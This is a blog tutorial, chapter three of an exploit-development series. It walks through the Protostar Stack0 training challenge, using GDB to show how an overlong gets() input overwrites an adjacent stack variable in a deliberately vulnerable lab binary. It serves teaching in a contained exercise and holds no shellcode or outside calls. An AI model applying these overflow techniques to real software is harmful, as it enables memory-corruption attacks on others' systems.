Reverse Engineering and Exploit Development Made Easy - Chapter 3


Reverse Engineering and Exploit Development Made Easy - Chapter 3: Linux BOFs

:~# ./im_back

Hello again fellow geeks! I’m back, bringing you another exciting chapter! I know I know, you’ve missed me. But I’m here to stay now!

In this chapter, we will dive into the basics of Linux exploitation. You will see that in many ways, Linux exploitation is quite similar to Windows.

Most concepts learned in the past will be applied here, so I suggest that you go through the previous chapters before going through this one.

With that being said, let us dive right in!

:~# ./intro

To understand the basics of Linux exploitation, we will start with its most basic form: stack buffer overflows.

We will start by learning memory corruption, which will give us a good understanding of how memory is treated in Linux, and from there we will gradually make our way into developing a complete exploit.

:~# configure

Protostar’s exploit exercises VM ( https://exploit-exercises.lains.space/protostar/ ) is a great resource that will help us on our journey, along with OverTheWire’s Narnia wargame.

So grab an ISO from Protostar, and set it up in your desired virtual machine manager. I will be using VirtualBox as always. We will use ssh to log into this VM (use hostname -I to get the local IP of the VM).

The default credentials for Protostar are user:user.

:~# setup

For Linux, the choice of debuggers isn’t as varied as on Windows. Throughout our journey, we will be mainly using GDB (the GNU Debugger), the standard debugger on most Linux systems. You can alternatively use EDB.

As we progress, we will see how we can pimp GDB up to do all sorts of cool tricks, and develop exploits with ease (spoiler alert: gdb-peda 😉).

:~# ./code_analysis

To see the source code of the challenge, we have to navigate to the exploit exercises website, where the source code for all challenges is given. We will be starting with the Stack0 challenge, which focuses on memory corruption. Take a look at the code below:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The includes just pull in the usual C headers. stdlib.h is the general-purpose standard library header, which covers memory allocation, process control, etc.

unistd.h is a header file that provides access to the POSIX OS API.

stdio.h is the standard input/output header file. It declares gets() and printf(), which this program uses.

The main function declares two local variables: buffer, an array of 64 characters, and modified, which is a volatile integer. The volatile qualifier tells the compiler that the variable may change in ways it cannot see, so it must not optimize away reads and writes to it. Without it, the compiler could assume modified is still 0 when it reaches the check. The main function also receives the usual argc and argv parameters, but this program never uses them: all of our input arrives on standard input.

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

modified is initially set to 0. The line below that calls gets(), which reads a line from standard input and stores it in buffer. Nothing is printed at this point.

 modified = 0;
 gets(buffer);

Now here is where our vulnerability lies, in the gets() function. The problem with gets() is that it has no idea how big the destination is. If we enter a string that is longer than 64 bytes, gets() does not do any check on the size whatsoever, so it will keep copying our input onto the stack until it finds a newline. Which means our string will OVERFLOW outside the given buffer of 64 bytes, and start to overwrite other variables, until our string ends.

For this challenge, we need to change the value of the modified variable, which is located somewhere on the stack. The if-else conditions tell us that we succeed once we change the value of the modified variable from 0 to anything else (i.e. not equal to (!=) 0).

if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
} else {
    printf("Try again?\n");
}

Alrighty then! Now that we have analysed the code completely, let us start debugging the binary in order to understand where our variables lie on the stack, and how our input affects it. I will be using GDB to debug the binary.

So first, fire up the Protostar VM, and use the command hostname -I to display the local IP address of the VM. I suggest that you use a Bridged Adapter while setting up the VM, and set the adapter to the current interface that’s being used. That way, the VM will be on your network and you can easily ssh into it. Binaries are located in /opt/protostar/bin/.

:~# ./debugging

To open the binary in GDB, we will use the command $ gdb stack0, followed by the command (gdb) disas main, which will disassemble the main function for us. What you see is a representation of the binary in assembly.

0x080483f4 <main+0>:	push   %ebp
0x080483f5 <main+1>:	mov    %esp,%ebp
0x080483f7 <main+3>:	and    $0xfffffff0,%esp
0x080483fa <main+6>:	sub    $0x60,%esp
0x080483fd <main+9>:	movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:	lea    0x1c(%esp),%eax
0x08048409 <main+21>:	mov    %eax,(%esp)
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    0x5c(%esp),%eax
0x08048415 <main+33>:	test   %eax,%eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	movl   $0x8048500,(%esp)
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	movl   $0x8048529,(%esp)
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret

So right off the bat, even if you don’t understand assembly too well, you can see the call instruction, calling the function gets() at the address 0x0804840c. This will come in handy during testing.

So a few things before we continue:

  • ESP is our stack pointer. It points to the top of the stack, which is the lowest address currently in use, since the stack grows towards lower addresses.
  • PUSH is an instruction which places a value (from a register, a memory location, or an immediate) on the top of the stack.
  • JMP is an instruction which will jump to a particular address to continue execution flow. JE is “jump if equal”, which jumps only when the zero flag is set. Here, the test %eax,%eax instruction before it sets the zero flag when EAX is 0, so the jump is taken when modified is still 0. This represents the “if-else” branch in our code.

Our objective here is to change the value of the modified variable from 0 to anything else. Modified is somewhere on the stack, and in order to overwrite it with our desired value, we will have to overflow a section of the stack that lies before this variable in order to reach it.

There is one line in the disassembly that is particularly interesting though. It moves the value of 0 (hex 0x0) to the location esp + 0x5c. This tells us the location of the modified variable on the stack. Now, we will use the previous call instruction, and this one to set our breakpoints. A breakpoint is a pause in the execution flow of the binary, which will help us in understanding how values on the stack change after a particular instruction is executed.

We will do this by executing:

(gdb) break *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb)

This will stop the execution flow before the call to gets() is made, and after that, before the value of modified is transferred to the accumulator (eax) for comparison. Now, let’s run the binary by executing r.

(gdb) r
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11

So we hit our first breakpoint, right before the call to gets(). If we run i r (short for info registers), it will give us further information on the registers at this point in time.

(gdb) i r
eax            0xbffffc5c	-1073742756
ecx            0x644d8780	1682802560
edx            0x1	1
ebx            0xb7fd7ff4	-1208123404
esp            0xbffffc40	0xbffffc40
ebp            0xbffffca8	0xbffffca8
esi            0x0	0
edi            0x0	0
eip            0x804840c	0x804840c <main+24>
eflags         0x200282	[ SF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

We can see that the address of the call instruction is in the EIP register. EIP holds the address of the next instruction which is to be executed. Now, let’s take a look at what the stack looks like right now by executing x/32wx $esp. This will print 32 hexadecimal words (4 bytes each) starting at the top of the stack. 32 has just been picked for simplicity.

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0xb7eada75
0xbffffc60:	0xb7fd7ff4	0x08049620	0xbffffc78	0x080482e8
0xbffffc70:	0xb7ff1040	0x08049620	0xbffffca8	0x08048469
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000
0xbffffca0:	0x08048450	0x00000000	0xbffffd28	0xb7eadc76
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848

We can use this to find the location of the modified variable. To find the address, we execute x/wx $esp+0x5c, as we know from earlier that the variable is stored at the location $esp+0x5c or 0x5c(%esp). x stands for ‘examine’, and the /wx suffix asks for one word (4 bytes) printed in hexadecimal, so this will give us the address and the contents of modified.

(gdb) x/wx $esp+0x5c
0xbffffc9c:	0x00000000

From this, we can see that the address of modified on the stack is 0xbffffc9c, and it contains 0. So if we correspond this with our stack print from earlier, this is where modified is:

                          These are contents
           |---------------------|----------------------|
           |                                            |
0xbffffc90: 0xb7ec6365	0xb7ff1040 0x0804845b 0x00000000 <---- modified

Addresses:  0xbffffc90  0xbffffc94 0xbffffc98 0xbffffc9c

Each word here is 4 bytes long, and the address before the colon (c90) belongs to the first word in the row. If we add 4 bytes to c90 three times until we reach 0x00000000, we get the address c9c. This is how the math works out in GDB.

Now, let’s continue execution flow by executing c. Then, let’s just enter a few A’s just as a test. That way, we will know the location of our buffer on the stack.

(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13	in stack0/stack0.c

We hit our second breakpoint, which is right before the binary moves the value of modified to EAX for the comparison (the if-else check). Now, let’s take a look at the stack:

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0x41414141
0xbffffc60:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc70:	0x41414141	0x41414141	0xbffffc00	0x08048469
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000 <-----
0xbffffca0:	0x08048450	0x00000000	0xbffffd28	0xb7eadc76
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848

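So the hexadecimal value of A is 0x41. We can see our A’s starting in the last word of the 0xbffffc50 row, that is, at 0xbffffc5c. This matches the value EAX held at the first breakpoint (the pointer passed to gets()), so our buffer starts at this address. We can also see that we still have not reached the modified variable at 0xbffffc9c, which is why we haven’t been able to overwrite its value. Remember the size of our buffer? 64. modified sits 0xbffffc9c - 0xbffffc5c = 0x40 = 64 bytes past the start of the buffer, so anything longer than 64 bytes will spill into it. If we enter 80 A’s, we should be able to overflow into the modified variable and change its value. Let’s give this a shot: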

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
11	in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13	in stack0/stack0.c

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0x41414141
0xbffffc60:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc70:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc80:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc90:	0x41414141	0x41414141	0x41414141	0x41414141 <----
0xbffffca0:	0x41414141	0x41414141	0x41414141	0xb7eadc00
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848

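Et voila! We have overwritten the value of the modified variable, and our A’s have also run over everything stored after it, including the saved EBP at 0xbffffca8. The string’s terminating null byte even clipped the lowest byte of the saved return address (0xb7eadc76 became 0xb7eadc00), which is most likely why the program crashes once main returns. Let’s do this outside of GDB now: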

$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ./stack0
you have changed the 'modified' variable
Segmentation fault

We have completed our first memory corruption exercise! This lays the foundation for stack buffer overflows, so if you’ve made it this far give yourself a good pat on the back! That’s all for now! I’ll see you in the next post!